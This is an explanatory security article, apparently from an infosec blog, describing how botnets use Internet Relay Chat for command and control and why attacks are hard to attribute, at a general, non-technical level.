Many internet chat participants have enjoyed the benefits of the Internet Relay Chat capability (IRC). This functionality has added fast and convenient communication, universal access and valuable functionality throughout the entire world. But there is a downside to the IRC in the world of botnets and cyber security attacks.

What is the IRC?
Internet Relay Chat (IRC) is a form of real-time Internet text that is mainly designed for group communication in discussion forums.

The IRC is powerful and universal. It supports all major computer operating systems and is easily accessible. With up to 600,000 users, the potential for cyber penetration becomes a world wide problem.

In addition to a vast number of server arrays, IRC client software is available for almost every computer operating system that supports TCP/IP networking.

What are Botnets?
A botnet is a destructive tool that takes many forms. Among the most destructive uses are distributed denial of service (DOS) attacks, spamming and financial data theft/fraud.

Network Penetration and Control
There are many ways to penetrate a network with malicious code. For example a simple, but risky way to compromise a network is to offer a special USB drive with innocuous but attractive code that carries hidden Trojan horses or other malicious code. However, this exposes the perpetrator to risk of discovery.

Allowing unlimited netsurfing on the web that includes unsafe or infected websites is another way of penetration but is random and can be stopped through vigilant network administration.

By far the most dangerous tool of anonymous network penetration and control however is through the use of the IRC. The IRC exposes very large networks worldwide and, when attacked by a knowledgeable perpetrator, can cause tremendous and often anonymous damage.

One of the easiest and most efficient ways to establish a Botnet is through the IRC.

Botnet creation, control and the IRC
The steps in the botnet creation illustrate the ease of creation and the fact that botnet creators usually distribute their bots to malicious third parties for a fee:

1. The botnet operator infects targeted pcs with malicious code (Trojan Horses and other destructive code) and commanding protocols that are then passed to the network server over the IRC. A command and control (C&C) server is created that allows control of the entire network.

2. The botnet created by the process is often sold to a criminal or terrorist enterprise.

3. The buyer then sends instructions to trigger a Distributed Denial of Service, spamming or data theft attack.

4. The attack creates significant damage and attacks can be repeated.

A botnet's originator (aka "bot herder" or "bot master") can control the group remotely, over channels provided by the IRC, and usually for terror or criminal related purposes. Individual programs at the client level appear as “bots".

Control of the botnet is usually through an IRC server that is also known as the Command and Control server. Some of the latest botnets are self generating through the use of custom designed code. These botnets are potentially extremely destructive.

Large user networks, some as large as 20,000 users or more, are tempting targets of botnet operators and many of these offer little resistance to botnet operators.

Attribution
Given the widespread reach of the IRC public and private networks, anonymous channels, the widespread use of encrypted scripts, sale of botnets to anonymous third parties and the fact that large networks in other countries are the most productive, attribution to the actual source of the attack is often impossible.

Visitors to apparently safe or trusted sites under the hidden control of a botnet operator are easily fooled into downloading infected files and open themselves to malicious attacks. The fact that a trusted site located within the United States is no guarantee of safety because the IRC opens even safe, trusted sites to remotely controlled, anonymous attacks.

The danger of attribution is supported by recent research (Source: Sans.org) that concluded that an overwhelming number of targets of cyber attacks in the United States are conducted through domestic botnets that pass malicious code to the greatest number of users.

Military and large commercial sites are priority targets often resulting in disruption to commerce with potential loss of classified data.

Cyber security attacks
Botnets allow criminal or terrorist elements the ability to control large installations of networked computers. By simply anonymously penetrating one individual PC that is part of a large network through a centralised Command and Control (CAC) Server, a cyber attack perpetrator can monitor and anonymously control networks that individuals trust.

This control often goes unnoticed at the individual pc level and can be exercised across borders with little fear of discovery.

Anonymous and efficient penetration of large scale networks is the key to success of botnets. While defensive attacks against botnets are enjoying some success, the enemy is clever and innovative and the challenge is tremendous.

—This article first appeared at:https://www.infosecisland.com/blogview/6992-Internet-Relay-Chat-and-the-Effect-of-Botnets-on-Security.html